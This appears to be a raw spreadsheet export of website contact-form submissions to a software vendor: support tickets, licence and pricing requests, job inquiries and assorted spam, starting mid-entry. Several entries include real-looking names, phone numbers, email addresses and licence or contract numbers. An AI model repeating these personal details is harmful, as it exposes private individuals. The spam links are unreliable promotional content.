◆◇◆◇◆◇◆◇◆◇◆◇◆◇◆◇◆◇◆◇◆◇◆◇◆◇_x000D_
￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣_x000D_
本日は、今すぐ働ける人材として、下記に「HOT人材情報」を提案いたします。_x000D_
興味ある人材でしたら、是非一度ご連絡下さい。_x000D_
_x000D_
今回のHOT人材 ＜1＞-----------------------------------------------_x000D_
【イニシャル】K・Sさん_x000D_
【ポイント】エクセル認定試験1級取得の20代主婦_x000D_
【経験値】総務・経理事務として、JDLの使用経験あり_x000D_
【就業形態】週3～4日、10：00～16：00、10：00～17：00など_x000D_
【月額例】120,000円（2,000円／時×5時間×月12日での勤務時）_x000D_
※通勤交通費は別で御請求いたします_x000D_
-------------------------------------------------------------------------_x000D_
_x000D_
今回のHOT人材＜2＞-----------------------------------------------_x000D_
【イニシャル】U・Nさん_x000D_
【ポイント】中小企業での、月次決算業務や年次決算補助業務経験もあり_x000D_
【経験値】11年以上、経理および経理事務として不動産会社や_x000D_
会計事務所、保育園など様々な業種における経験を積んできました。_x000D_
※税理士試験　財務諸表論合格、年末調整検定中級取得_x000D_
【就業形態】週2～3日、10時～16時_x000D_
【月額例】115,000円（2,300円／時×5時間×月10日での勤務時）_x000D_
※通勤交通費は別で御請求いたします_x000D_
-------------------------------------------------------------------------_x000D_
_x000D_
今回のHOT人材＜3＞-----------------------------------------------_x000D_
【イニシャル】K・Cさん_x000D_
【ポイント】弥生会計、PCA、勘定奉行、スーパーストリーム、オラクル、JLDなど_x000D_
会計ソフトは何でも使える経理スペシャリスト_x000D_
【経験値】財務表（BS・PL表）作成や月次・半期/年次決算（単体・連結資料作成補助）などの財務経理から_x000D_
社内法務（契約書管理、取締役会・株主総会運営アシスタント）など人事総務まで_x000D_
10年以上の経験あり_x000D_
【就業形態】週3日、10時～16時_x000D_
【月額例】144,000円（2,400円／時×5時間×月12日での勤務時）_x000D_
※通勤交通費は別で御請求いたします_x000D_
-------------------------------------------------------------------------_x000D_
_x000D_
上記以外にも毎日パート人材が登録にお越しいただいてます。_x000D_
経験職種や取得されている資格などは多岐にわたります。_x000D_
_x000D_
その中でも、弊社が特化し強みとしているのが下記の職種となります。_x000D_
◆Web人材（デザイナー、ディレクター、コーダー、HP更新、DTP等）_x000D_
◆ITエンジニア（SE・PG、テスト工程、アシスタント等）_x000D_
◆事務系職種（営業事務、経理事務、総務事務、受付事務、医療事務等）_x000D_
◆サポート系職種（カスタマサービス、テレマ、CAD事務、営業アシスタント等）_x000D_
_x000D_
実際にパートタイム派遣をご活用頂いている_x000D_
企業様をご紹介しております。是非、こちらもご覧</t>
  </si>
  <si>
    <t>I have a Windows 10 operating system.  When I downloaded the latest version of First Class 16 it doesn't work. The program doesn't completely open &amp; then immediately closes down.  The previous version 12 worked just fine.  Any suggestions?</t>
  </si>
  <si>
    <t>looking at implementing a new faxing solution capable of faxing direct from the desktops, we are interested in your appliance and would like to get pricing on it._x000D_
thank  you.</t>
  </si>
  <si>
    <t xml:space="preserve">we are looking for a complete Media managment system for our video and photo teams, _x000D_
we would need a complete solution, from invest, logging, seraching and delivery of content, It would be great if the system can work with photoshop and Premiere software.._x000D_
_x000D_
Please let me know if you have a system._x000D_
_x000D_
thanks_x000D_
mark_x000D_
</t>
  </si>
  <si>
    <t>I would like to ask if you have remote computer access with audio &lt; I need to have control over my clients screen and the audio which is being played on their computers , can i have that with your service ?</t>
  </si>
  <si>
    <t xml:space="preserve">We are a current customer and we have an issue with Bizmanager and our data flow from TLi. </t>
  </si>
  <si>
    <t xml:space="preserve">i need to Quotation for RCJY renewal  </t>
  </si>
  <si>
    <t>information about product</t>
  </si>
  <si>
    <t>Our CREATIVE group is engaged in the promotion and creation of online projects for spa salon in the city Fresno for your business on a turn-key basis. _x000D_
 _x000D_
Formulate the right website, which will not only look unusual, but also help attract more regular customers. _x000D_
 _x000D_
With development online project spa center we will find for you efficient solution, develop an attractive design Considered easy to navigate through site. We have been creating for many years websites, and good know what exactly is required to create a quality online service massage salon. _x000D_
 _x000D_
We carefully think through every portal. The specialists of the web studio study the leading websites on the market for spa salon, programmers introduce new technologies, SEO specialists think out how to do it to website liked the search engines. We will find an effective solution for presenting information about you. Attractive design, convenient structure, interactive services will allocate you among other sites websites erotic salons. _x000D_
 _x000D_
You can choose the design of online project from the proposed basic designs. When ordering online service in the proposed basic designs are made changes: added your logo, slogan, title online service. In addition, the main image can be changed to another one, suitable for the topic. _x000D_
 _x000D_
Creative Promotion : [url=https://creation-of-sites-for-massage.pro/]smm site for adult workshop[/url]</t>
  </si>
  <si>
    <t>We are a newly established corporate law firm based in Kuwait, and are keen on incorporating a document management system into our offices. EDocs is among the best DMSs we've seen and would love it if you could provide us with more information regarding it. We would like to know how much it would cost to purchase this system, in addition to whether or not we could get a demonstration of how it works. Many thanks.</t>
  </si>
  <si>
    <t>Am look for jobs</t>
  </si>
  <si>
    <t xml:space="preserve">There is a requirement from North Oil to get a document exchange/ interface management solution in order to manage interfaces between multiple engineering contractors. _x000D_
_x000D_
Pls send us yiur best proposal and kindly contact me for additional details </t>
  </si>
  <si>
    <t>Dear Mr. Jenkins,_x000D_
I received my physics undergrad degree from UW and have played in the UW Convocation Winds for many years now.  I couldn't find a way to contact you via the UW website._x000D_
You do a great job as UW Chancellor, but there are two pronunciations of Latin derivations that an engineer might not have learned but, in your role as UW Chancellor, you need to pronounce at every Convocation.  They are: "emeritus" and "absentia".  There are not two t's in absentia.  The graduands are simply absent - they are not abstaining, although some might be ;)  _x000D_
The word "abstentia" does have a nice ring to it.  However, it doesn't exist._x000D_
Since each Convocation ceremony is recorded for posterity, it might be nice to have the very important future pronouncements you will make recorded with the correct pronunciation._x000D_
See you at Spring Convocation!_x000D_
Regards,_x000D_
Steve_x000D_
71062007</t>
  </si>
  <si>
    <t>To apply for a job</t>
  </si>
  <si>
    <t>Приветствую всех! _x000D_
Нашел Интересные новости на этом сайте:  http://watafak.ru : _x000D_
http://watafak.ru/foto-prikoly-interesnoe/6807-vyrazitelnaya-seksualnost-devushek-70-h-godov.html [b] Выразительная сексуальность девушек 70-х годов [/b] _x000D_
[url=http://watafak.ru/foto-prikoly-interesnoe/54-charuyuschie-alpy.html] Чарующие Альпы [/url] _x000D_
http://watafak.ru/foto-prikoly-interesnoe/3607-royal-the-baby-ot-goldfinch-pianos-i-based-upon.html _x000D_
http://watafak.ru/foto-prikoly-interesnoe/726-samye-dorogie-zhidkosti-v-mire.html</t>
  </si>
  <si>
    <t>I have installed LiquidOffice but I got an error with not being able to bind Port 80 to the server. I am now unable to get onto the web portal for LiquidOffice when I select Portal in the start menu._x000D_
_x000D_
Please provide urgent assistance as I am trying to configure the server for a demonstration on Monday.</t>
  </si>
  <si>
    <t>Производство мебели на заказ в Санкт-Петербурге, подробности смотрите на сайте [url=http://akro-spb.ru]akro-spb.ru[/url]</t>
  </si>
  <si>
    <t>Чтобы построить по-настоящему теплоэффективный дом, надо позаботиться об утеплении не только стен, но и крыши, подробнее об этом читайте на сайте [url=http://teletap.org]teletap.org[/url]</t>
  </si>
  <si>
    <t xml:space="preserve">Ive been lead to beleive that i won free spin no deposits  an surprise  surprise  i carnt do nothing  unless  i deposit money why say free spins if not i want to cancel this site for good its folse an i will be advisin socail media of the scam youve done to me </t>
  </si>
  <si>
    <t xml:space="preserve">You keep calling my house with your fax. I go to your webpage www.opentext.com/block and get an ERROR message to remove my home, personal, unlisted, and on the do not call registry phone number off your list.  I would love your phone number to call you.  I would also like to know all the companies you service so that I can never use them again.  Remove my number immediately or I will report you to the FCC for not supplying a VALID removal option.  _x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Oracle wishes to migrate from SharePoint2007 to the best available alternative for content mgt. and team collaboration.  These are our requirements: Oracle Corp is looking for an alternative to Microsoft SharePoint.  We have a multi-year collection of documents in SharePoint - these are our primary requirements: (1) HIPAA certified, (2) separate "sites" - one private site for each of our customers - customer access not required, (3) on each site: folders and sub-folders, (4) Ability to set permissions at the site and folder level, (4) security Groups that can be applied to sites or folders, (5) document editing in the browser for Microsoft Office 2010 and above applications, (6) all edited versions of docs are retained with metadata for "Modified Date" and "Modified By," (7) a List item like Excel that can be used for issues tracking with export/import from Excel a plus, (8) locking documents for check-out/check-in editing, (9) templates for sites and libraries of folders which can be replicated in new locations, (10) announcements, discussions and search, (11) subscribe to email notification when a document is changed, (13) ability to upload/download/move files in bulk within and outside the application, (13) Logs of activities on each site, (14) "warm" disaster recovery, (15) records management - tracks how long content is retained before we delete, (16) recover deleted content within a reasonable time, (17) a proven method or 3rd party tool that will migrate large amounts of content from SharePoint2007 with document versions and metadata retained unchanged, (18) Can be installed in an Oracle Data Center. </t>
  </si>
  <si>
    <t>We are looking for sponsorships of $500 to help us continue with our operations. This includes, but is not limited to, giving free health assessments, after school programs, and school assemblies to overweight and obese adolescents up to age 18. The $500 sponsorship is for the fundraising event that we are hosting, which is a team-based obstacle course called Winter Runnerland on December 16, 2017. Please contact me back at your earliest convenience with any questions that may arise. Thank you for your time.</t>
  </si>
  <si>
    <t xml:space="preserve">I'm looking for RightFax server download and API documentation. _x000D_
Since 2008, Kyocera has built and provided an MFP connector for RightFax. We need to test compatibility with the latest version. </t>
  </si>
  <si>
    <t>Contract Lifecycle Management, Digital Asset Management, Document Repository Management</t>
  </si>
  <si>
    <t>Looking for ECM tool primarily for record management, document reduction, version control/archiving/tracking in collaborative environment for strategic planning operations.</t>
  </si>
  <si>
    <t>We would like a demo of your ECM platform</t>
  </si>
  <si>
    <t>Looking for options to upgrade/migration for existing applicationxtender to integrate with Banner Document Management.</t>
  </si>
  <si>
    <t>Возможно, вы затруднительно закупить настоящие запчасти? Запасные части покупки начинают становиться проблемой? _x000D_
У нас более миллиона запчастей, и у нас обязательно будет то, что вам нужно. Наш выбор запчастей охватывает широкий спектр продукции для посетителей. Если вам надо приобрести автозапчасти для вашего автомобиля, то приглашаем вас к нам в магазин автозапчастей, где можно найти все для таких автомобилей как Chery QQ6.  Также у нас есть свой собственный интернет магазин автозапчастей для иномарок в котором можно купить рычаг подвески для Citroen C6 в интернет магазине автозапчастей для иномарок. Наш магазин автозапчастей дает кредитование под беспроцентный. Спрашивайте нашим менеджерам о наличие запчастей для Cadillac CTS. Гарантия и качество от autocomponent63.ru. _x000D_
 _x000D_
Мы вам напишем на почту где и как нас найти. Расскажем о доставке ваши автозапчасти для иномарок для решетка радиатора. _x000D_
 _x000D_
Итернет Магазин запчастей: [url=https://autocomponent63.ru]магазин автозапчастей для иномарок[/url]</t>
  </si>
  <si>
    <t>Course dates for Virtual Classroom - North America session for the Content Server Business Consultant Certification v16 courses. Please email me the dates if they're known.</t>
  </si>
  <si>
    <t>The support account is not activated. I have registered and confirmed by email several times but I still cannot open any ticket with my account.</t>
  </si>
  <si>
    <t>Good Afternoon,_x000D_
 _x000D_
We are a third party company working on behalf of Chase to verify employment for an individual at Actuate.  Can you please advise how we can go about obtaining the employment verification? If you prefer to call, please call 855-550-6772 and reference # 16667496. This information is time sensitive, so your prompt response is appreciated._x000D_
 _x000D_
Thank you</t>
  </si>
  <si>
    <t>Instruction on transferring Brava software to new hardware.  Emailed detail would be great.  Thanks.</t>
  </si>
  <si>
    <t>purchased a new license, but did not get sent a download link</t>
  </si>
  <si>
    <t>We bought 'Exceed Single License (Electronic)' via Softlinegroup and recieved 'packing slip'. What we should do next? Where we can obtain license and installation files? Access to https://knowledge.opentext.com/go/16142487 is closed.</t>
  </si>
  <si>
    <t xml:space="preserve">Being support resource need my support access. </t>
  </si>
  <si>
    <t>Need to get more information on a Training strategy for our company for CS16</t>
  </si>
  <si>
    <t xml:space="preserve">                                                                                                                               Sté. SOCECS_x000D_
                                                                                                                               Sfax (Tunisie)_x000D_
_x000D_
_x000D_
                A l’aimable attention de Monsieur/Madame le responsable_x000D_
 _x000D_
_x000D_
Objet : Demande de collaboration de partenariat avec votre société_x000D_
_x000D_
_x000D_
	Monsieur, Madame_x000D_
_x000D_
_x000D_
Nous venons par la présente demander votre haute bienveillance de bien vouloir étudier la possibilité de collaboration de partenariat ensemble avec votre société._x000D_
_x000D_
Je vous informe que nous sommes, Mme et Mr. KHRIFECH, responsables de la Société Oméga de Conseils, d’Etudes, de Consulting, et de Services (SOCECS), une société nouvellement créée et spécialisée dans le domaine de conseils, de consulting et de services en BIG DATA en Tunisie, un domaine en vogue et à l’étape embryonnaire qui pourrait apporter de profondes transformations dans la manière de créer, de transmettre, de stocker, et d’utiliser les données._x000D_
 _x000D_
	Notre mission consiste à introduire le domaine de BIG DATA dans les organisations et les entreprises Tunisiennes, en commençant par l’étude, le conseil, et le consulting pour aboutir à proposer des solutions informatiques convenables et adaptables au contexte de ces BIG DATA, c’est-à-dire les solutions les plus adaptées à la collecte, au stockage, et à l’analyse de ces données. Votre contribution sur ce domaine nous a attiré et nous a amené à s’intéresser pour une éventuelle collaboration de partenariat sur le marché Tunisien pour pouvoir s’imposer devant les concurrents._x000D_
_x000D_
	Nous restons à votre entière disposition pour toutes informations complémentaires et dans l’attente d’une réponse favorable, veuillez agréer, Mr le responsable, l’expression de nos profonds respects._x000D_
_x000D_
_x000D_
_x000D_
Cordialement Mme Yousra ELLOUMI KHRIFECH_x000D_
                    Gérante SOCECS_x000D_
    Tel : (+216 98415602) et (+216 25415602)_x000D_</t>
  </si>
  <si>
    <t xml:space="preserve">Bonjour, _x000D_
Dans le cadre d'une de nos interventions auprès d'un client public, ce dernier envisage la possibilité de renouveler son système de GED. Nous voudrions en discuter plus amplement avec vous en termes de fonctionnalités couvertes par vos outils vis-à-vis des contraintes de notre client. _x000D_
Cordialement, </t>
  </si>
  <si>
    <t>Is version 14 of hostexplorer still supported? If so, is it supported under win10? is version 15 supported under win10? what are the end of life support dates for versions 14 and 15? thanks</t>
  </si>
  <si>
    <t xml:space="preserve">Our organization is in the early phases of implementation. We have purchased OCR but it is not ready to be used quite yet. We have divisions wanting to scan documents into the system now but they are hesitant because they are questioning whether or not they'll have to re-scan everything once we have OCR implemented. I was under the impression that it was okay to scan now, then once OCR is implemented, we can "convert" the documents already in the system to be OCR recognizable. Is that correct? We just need confirmation that we won't have to re-scan everything once OCR is capable. Thank you! </t>
  </si>
  <si>
    <t>Would like to know how Documentum handles viewing CAD files in DMS</t>
  </si>
  <si>
    <t>I would like to receive a pricing for licence Gupta SQLbase for Windows._x000D_
_x000D_
Can you send me a quote and the different version of software ?_x000D_
_x000D_
Regards</t>
  </si>
  <si>
    <t>Filled out form to get Brava Reader Download but have not gotten the link</t>
  </si>
  <si>
    <t>Hallo, _x000D_
_x000D_
ich habe einen Microsoft Surface und habe vor kurzem eine Brava Desktop Lizenz gekauft. Wenn ich meinen Surface mit dem Netzstecker bediene funktioniert Brava. Wenn ich den Stecker abziehe kommt eine Lizenz Fehlermeldung. _x000D_
_x000D_
Ist Brava Desktop kompatibel mit Microsoft Surface? Hatten Sie vergleichbare Fälle? Bitte um eine Rückantwort._x000D_
_x000D_
Mit freundlichen Grüßen_x000D_
_x000D_
Ibrahim Celik</t>
  </si>
  <si>
    <t>Do you now own the product called eRoom._x000D_
If yes, can I find out how I get it, how much it costs etc_x000D_
Thanks</t>
  </si>
  <si>
    <t>Hello,_x000D_
Can you please send me offer for upgrade/renewal of the license for Brava desktop?_x000D_
_x000D_
If it is not possible, please send me the offer for new license._x000D_
_x000D_
Thank you_x000D_
_x000D_
Borek Adamek</t>
  </si>
  <si>
    <t>Our fax server ran out of space yesterday because the Images folder became too full.   Apparently, our Administrator account does not have access to the DBPurge utility, which we need so that old faxes can be deleted from both the database and the Images folder.  Can someone please contact me at 603-609-6076 to set this up._x000D_
_x000D_
Thanks,_x000D_
Scott</t>
  </si>
  <si>
    <t xml:space="preserve">I used Pro Vision V6 (i think), we are starting off a company-wide global re-engineering project and I would like to trial the tool to show the team what is possible  </t>
  </si>
  <si>
    <t>Bonjour, Urgent Pouvez-vous me faire parvenir par mail la facture du mois d'août ?_x000D_
Salutations Pascale pour SARL Mareyage Hennequin</t>
  </si>
  <si>
    <t>Dear Sir,_x000D_
_x000D_
We GUPTA 3.5 environment and we need a tool to extract (dump) the data in order to looad it in an other environment._x000D_
_x000D_
Could you help us ?_x000D_
_x000D_
We did not find any ODBC tool or other software in our environment._x000D_
_x000D_
Thank you for your help._x000D_
_x000D_
Best Regards_x000D_
_x000D_
Gilles ZAOUI</t>
  </si>
  <si>
    <t>Good day,_x000D_
Do you have a content and user experience management solution? if you do, how much is it selling for?</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Friends,_x000D_
We need Exceed 1 Year License Renewal for our customer._x000D_
_x000D_
Required information is as follows._x000D_
End User Number  - EU0169107_x000D_
SUID or Serial Number - V1185-37000_x000D_
Support Contract Number - RC168373_x000D_
Alternate Company Name - AVEA Iletisim Hizmetleri A.S._x000D_
_x000D_
Can you share pricing and availability information._x000D_
my e-mail is: mselkaya@aidata.com.tr_x000D_
_x000D_
hoping to hearing you soon._x000D_
_x000D_
Kind regards_x000D_
Mahmut_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>We have an interest in using OpenText Composer Notes for a Lotus Domino/Notes phase-out project._x000D_
We would like a more clear view on the possible cost of using Composer Notes. Already gained some information from a consultant but this raised more questions.</t>
  </si>
  <si>
    <t>I have problem entering the knowledge base were we store our project documentation. For instance if I receive a link through email such as: https://knowledge.opentext.com/knowledge/cs.dll/open/69527379 I can't open it directly. I have to search for the knowledge base and then enter the code to be able to read the docs. Can you help me to be able to use direct links?</t>
  </si>
  <si>
    <t xml:space="preserve">Please delete my User-Account. I would like to re-register an (new) account, because I have no access / become no access to the support area ( e.g. Download Patches for Captiva Capture 7.6) with my existing account after some support request and after some required mails into this portal. Thanks for your help! </t>
  </si>
  <si>
    <t>can buy Brave Reader?</t>
  </si>
  <si>
    <t>Ich benötige einen Kostenvoranschlag für die Realisierung Archivierung Dokumente aus Filesystem die unter DokuLink im SAP-System verwaltet und angezeigt werden werden._x000D_
MFG_x000D_
Werner Schuster</t>
  </si>
  <si>
    <t>Sehr geehrte Damen und Herren,_x000D_
_x000D_
um Sie bei einer Lösungsauswahl zu berücksichtigen, benötigen wir sehr kurzfristig folgende Informationen zu Ihrem Portfolio:_x000D_
- Informationen, wie ein Rechnungsfreigabeprozess mit Opentext abgebildet werden kann. Diese Informationen am besten mit Screenshots der Lösung verbildlicht._x000D_
- Inwieweit unterstützt Opentext das E-Procurement (vgl. SAP Ariba). Dazu auch gerne Basisdaten, wie viele Lieferanten sich in Ihrem Netzwerk befinden. _x000D_
- Weiter benötigen wir Informationen über die Preise Ihrer Lösungen._x000D_
_x000D_
Sollten Sie uns einen persönlichen Ansprechpartner zur Seite stellen, müsste der Kontakt notwendigerweise in deutscher Sprache stattfinden, da dies auch die Sprache in den entsprechenden Projekten (vornehmlich im öffentlichen Sektor) ist._x000D_
_x000D_
Ich danke Ihnen bereits im Vorraus für Ihre Unterstützung und freue mich auf eine gute Zusammenarbeit._x000D_
_x000D_
Mit freundlichen Grüßen aus Frankfurt am Main_x000D_
Paul Momper</t>
  </si>
  <si>
    <t>We are already partners of Open Text, providing RighFax &amp; Alchemy in Greek and Cypriot market. We are interest to provide OpenText TeleForm too.</t>
  </si>
  <si>
    <t xml:space="preserve">We are going to deploy the opentext edocs server setup 5.3.1_x000D_
so we need to purchase the opentext edocs server 5.3.5 _x000D_
how can proceed  for purchasing  please help me  </t>
  </si>
  <si>
    <t xml:space="preserve">I like to meet new people and have fun </t>
  </si>
  <si>
    <t>When I try to open a ticket it says that I do not have permission to do so.</t>
  </si>
  <si>
    <t>Hey,_x000D_
_x000D_
I hope this email finds you well! I’m actually looking to place a text link in one of your existing article https://blogs.opentext.com/enterprise-world-2016-essential-guide-buying-cowboy-boots/. Would that be something you could accommodate?_x000D_
_x000D_
Best Regards,_x000D_
Amber Lane_x000D_
www.rocketfern.com</t>
  </si>
  <si>
    <t>General Product Discussion for OCR Capture and Recognition</t>
  </si>
  <si>
    <t>Looking for a cliyd based fax solution that is SAP certified</t>
  </si>
  <si>
    <t xml:space="preserve">el merge pblisher de teleform cuando se hace la mezcla con accces solo imprime la primera pagina del formulario </t>
  </si>
  <si>
    <t>Hi, I'm trying to download the free reader.  I filled out the form yesterday, and haven't seen anything yet.  Can someone help, please?</t>
  </si>
  <si>
    <t xml:space="preserve">I would like the sales team to give me a demo of OpenText Automated Output Accessibility </t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
_x000D_
I am reaching out to let you know our  company MorCare, LLC has been acquired by Harris Computer.  I want to let you know our new Bill to for Mailing, it follows:_x000D_
_x000D_
MorCare, a Harris Healthcare Company_x000D_
2300 Corporate Pak Drive_x000D_
Suite 400_x000D_
Herndon, VA 20171_x000D_
Attn: Cheryl Flees_x000D_
_x000D_
Our New email to send bills:_x000D_
_x000D_
CFlees@harricomputer.com_x000D_
_x000D_
Thank you,_x000D_
_x000D_
_x000D_
Chris Brindle_x000D_
Receptionist/Office Manager_x000D_
MorCare, LLC_x000D_
222 S. Riverside Plaza, Suite 1850_x000D_
Chicago, IL 60606_x000D_
312-431-0123_x000D_
cbrindle@morcarellc.com_x000D_
</t>
  </si>
  <si>
    <t>Hello- Please provide the master service agreement. This is needed for contract and vendor management purposes. Thank you!</t>
  </si>
  <si>
    <t>Need to map out ProVision licensing pricing and training pricing</t>
  </si>
  <si>
    <t>Good Afternoon,_x000D_
_x000D_
We are a third party company working on behalf of Chase  to verify employment for an individual at Actuate . Can you please advise how we can go about obtaining the employment and income verification?  You can email us back at dataverifyvoe@dataverify.com, or call 855-550-6772 and use reference 16667496. This information is time sensitive, so your prompt response is appreciated._x000D_
_x000D_
Thank you</t>
  </si>
  <si>
    <t xml:space="preserve">We are looking for a quote for VAN service through which we can exchange data with our customers. We transfer up to 100 Kilo characters which includes both inbound and outbound. </t>
  </si>
  <si>
    <t>I can not gain access today and when I clicked on forgot my password and entered my email, it is telling me that it is not correct..... I called and spoke with Chris who didn't know where to direct me. I need reset.</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
Would you be interested in acquiring our recently updated contact list of “Financial Professionals” with emails address? If so, please let me know your target audience. I will get back to you with counts and best pricing option._x000D_
	_x000D_
Target Industry:  _____________; Geography:  ______________; Job Title (Any):  _________________:_x000D_
_x000D_
Data included: company name, contact name, fist name, last name, email address, title, website, address, address 1, city, state, zip code, country, phone number, fax number, employees size, revenue ($ mil), SIC code and industry. _x000D_
_x000D_
Look forward to hearing from you._x000D_
_x000D_
Thanks,	_x000D_
_x000D_
Marcus Ford_x000D_
Inside Sales Executive</t>
  </si>
  <si>
    <t>I would like information on getting right fax set up for multiple computers in one office. Thanks!</t>
  </si>
  <si>
    <t>We are looking for the replacement of our current reporting solution so we have started an exploration of Enterprise Report Management solutions._x000D_
We would like to meet with you to make a presentation of your Infoarchive solution.</t>
  </si>
  <si>
    <t>Would like someone to contact me regarding services and relationships that you are currently providing to MGM.</t>
  </si>
  <si>
    <t>Could you send a receipt for my purchase 42348972400  ?</t>
  </si>
  <si>
    <t xml:space="preserve">Reservierungs Anfrage: The Fiddlers in Bonn - Dez 12, 2017_x000D_
Diese Nachricht ist für Frau Isabel Schwember, die eine Anfrage für eine Firmenfeier bei uns per Telefon erfragt hat. Leider ist die notierte Email Adresse nicht gültig, und auch finde ich auf der Webpage kein Email Kontakt, weshalb ich hier schreibe. Frau Schwember kann uns gerne über Email kontaktieren, damit ich Ihr unser Angebot zuschicken kann._x000D_
_x000D_
Ich hoffe Sie können diese Nachricht weiterleiten,_x000D_
und verbleibe_x000D_
mit freundlichen Grüßen,_x000D_
Maggie Thomas_x000D_
</t>
  </si>
  <si>
    <t>Looking for more information on Records Management functionality for SharePoint sites.  I am currently doing an evaluation for a client to determine best RM solution for them.</t>
  </si>
  <si>
    <t>Good afternoon, OpenText Team!_x000D_
_x000D_
Hope you are well!_x000D_
_x000D_
This is Eliseu from Targetware Informatica. We have an open opportunity in our system, could you please help me with this quote?_x000D_
_x000D_
End User: Senior Solutions_x000D_
_x000D_
Product: OpenText Gupta Team Developer_x000D_
Quantity: 5_x000D_
License: Commercial_x000D_
Platform: Windows_x000D_
_x000D_
Kind Regards,_x000D_
Eliseu Kaleniuk</t>
  </si>
  <si>
    <t xml:space="preserve">It is with great pleasure that we invite you to register for the 11th  edition of the Toronto Global Forum taking place from October 30th to November 1st ,2017.  The Forum will be held at the Fairmont Royal York Hotel in Toronto and will focus on the theme “Redefining Globalization”. _x000D_
_x000D_
Among the confirmed speakers for the 11th edition, we are honored to welcome among others:_x000D_
•	Juan Manuel Santos Calderón, President of the Republic of Colombia_x000D_
•	Kathleen Wynne, Premier of Ontario_x000D_
•	Ángel Gurría, Secretary-General, Organisation for Economic Co-operation and Development (OECD)_x000D_
•	John Tory, Mayor of Toronto_x000D_
•	Volodymyr Groysman, Prime Minister of Ukraine_x000D_
_x000D_
_x000D_
There will be forums and networking sessions on various topics such as advanced manufacturing, global economy, governance, finance, innovation, energy, infrastructure, trade, and sustainable development. The Preliminary Program is available on our website. _x000D_
http://forum-americas.org/toronto/home/_x000D_
http://forum-americas.org/toronto/2017-edition/program-2/_x000D_
_x000D_
Thank you,_x000D_
_x000D_
Best Regards,_x000D_
_x000D_
Natalia Senkina_x000D_
Relations avec Participants ǀ Participant Relations_x000D_
Forum économique international des Amériques ǀ International Economic Forum of the Americas _x000D_
Office: +1 514-871-2225 x 228 | Toll Free (US/CAN): 1 866 865-2225  _x000D_
Mobile +1 514-431-4028_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Hello _x000D_
I am the IT person for Hooper Law In Hamilton Ontario, CANADA_x000D_
Our service contract has expired and probably has been for a while.  Need to know cost of renewing it or buying a new contract.  We have an Open Text A102 device.  PN:GGWM00014,  I have  Serial number if need be.  _x000D_
Thank you </t>
  </si>
  <si>
    <t>Please contact to discuss a partner program.</t>
  </si>
  <si>
    <t xml:space="preserve">I can't figure out how to delete a generation. I am creating training materials, so created a generation to demonstrate some advanced versioning options, but am now unable to remove it. </t>
  </si>
  <si>
    <t xml:space="preserve">I am sending out an RFP to all OpenText partners who do business in the US. Can you send me their email addresses in some kind of file format? Or just a list would be more helpful than the drop down that is on the website. We are okay with Silver, Gold, as well as Platinum partners. </t>
  </si>
  <si>
    <t xml:space="preserve">Hello:  I am the IT guy for Hooper Law which has an Open Text Fax appliance._x000D_
I think we are a few versions out of date.  When I try to go into the admin web page GUI, it greys out all the AMDINISTRASTION buttons, so I cant even do a backup of the device.  Also Silverlight keeps asking to be installed, I do so and it asks again and wont let me login.  I managed to log in to the device via IE web browser that did not ask for Silverlight._x000D_
Please let me know if you need more info from me.  Ideally I need to find cost for support or a free firmware upgrade we are at version 1.6.102.0_x000D_
thank you </t>
  </si>
  <si>
    <t>The support packages and ACP files for the Vendor Invoice Management for SAP Solutions 7.5 are not available in the SAP marketplace._x000D_
 SAP note "2068615 - SAP Invoice Management by Open Text 7.5"</t>
  </si>
  <si>
    <t>The support packages and ACP files for the Vendor Invoice Management for SAP Solutions 7.5 are not available in the SAP marketplace.</t>
  </si>
  <si>
    <t>Dear all,_x000D_
We want to register our empoloyee on course https://www.opentext.com/training/coursedetails.html?id=2018 in Stocholm on November 6th. I've filled all information and been asked for PO Number, as I do not have it I finish the application._x000D_
How to get PO or How to get pre invpice to pay for this course?_x000D_
Thank you in advance,_x000D_
Sandra Gucul</t>
  </si>
  <si>
    <t>We would like to extract data from files (PDF/Excel/Word) we have in our company drive, and I think OpenText Capture Centre does the job. I would like to know the pricing of your products and see if it fits our company.</t>
  </si>
  <si>
    <t>Currently we work with the TemSide solution in our website. The version 7.1.0_x000D_
We have many problems with the version and we would like to upgrade, but we are indecided if we keep with TeamSide or change to other solution._x000D_
So, can someone introduce the current version for us with a demo?_x000D_
_x000D_
Thanks._x000D_
Bruna Nezello</t>
  </si>
  <si>
    <t xml:space="preserve">I am having difficulties logging on to my account and want to register compliance for my account . Thank you </t>
  </si>
  <si>
    <t xml:space="preserve">Access is hi I have been trying to get access to my support site without any luck_x000D_
_x000D_
I have confirmed my email 3 time but not luck, I should have been made Administrator for FNB South Africa but as I still can not log in to support_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Interesse am Add-On "Open Text Vendor Invoice Management for SAP Solutions"</t>
  </si>
  <si>
    <t>Bonjour,_x000D_
_x000D_
Notre société EFLUID souhaiterait inscrire trois personnes sur la prochaine formation STREAMSERVE L'ESSENTIEL._x000D_
Pourriez-vous s'il vous plaît me contacter afin de les inscrire ?_x000D_
D'avance merci.</t>
  </si>
  <si>
    <t>I am trying to find how to download an old version of "RedDot Extended Content Management Server 11.1" which has since been rebranded._x000D_
_x000D_
I have a valid perpetual license for the use of it but do not have the installer. Please could you provide me with access to, or the location of the sutiable software._x000D_
_x000D_
Many thanks</t>
  </si>
  <si>
    <t>could you please delete my account? I don't need it. I didn't find a way to delete it myself.</t>
  </si>
  <si>
    <t>I want software testing job so i contact you.</t>
  </si>
  <si>
    <t xml:space="preserve">I came across your website after searching for software companies on cylex-usa.com._x000D_
_x000D_
And I was wondering if you would like to partner up?_x000D_
_x000D_
Basically what we do is make animated videos that are designed to promote your service online and increase your website conversion rate._x000D_
_x000D_
So I wanted to offer you a 30 second cartoon explainer video for your service for just $197. (including script/voiceover)_x000D_
_x000D_
All I ask in return is a quick testimonial if you like the video!_x000D_
_x000D_
If you are interested in this offer, you can find out more or get started at www.30secondexplainervideos.com/explainer-promo_x000D_
_x000D_
_x000D_
Or you can shoot me a quick email if you had any questions!_x000D_
_x000D_
Cheers, Travis Cole_x000D_
www.30secondexplainervideos.com/explainer-promo_x000D_
</t>
  </si>
  <si>
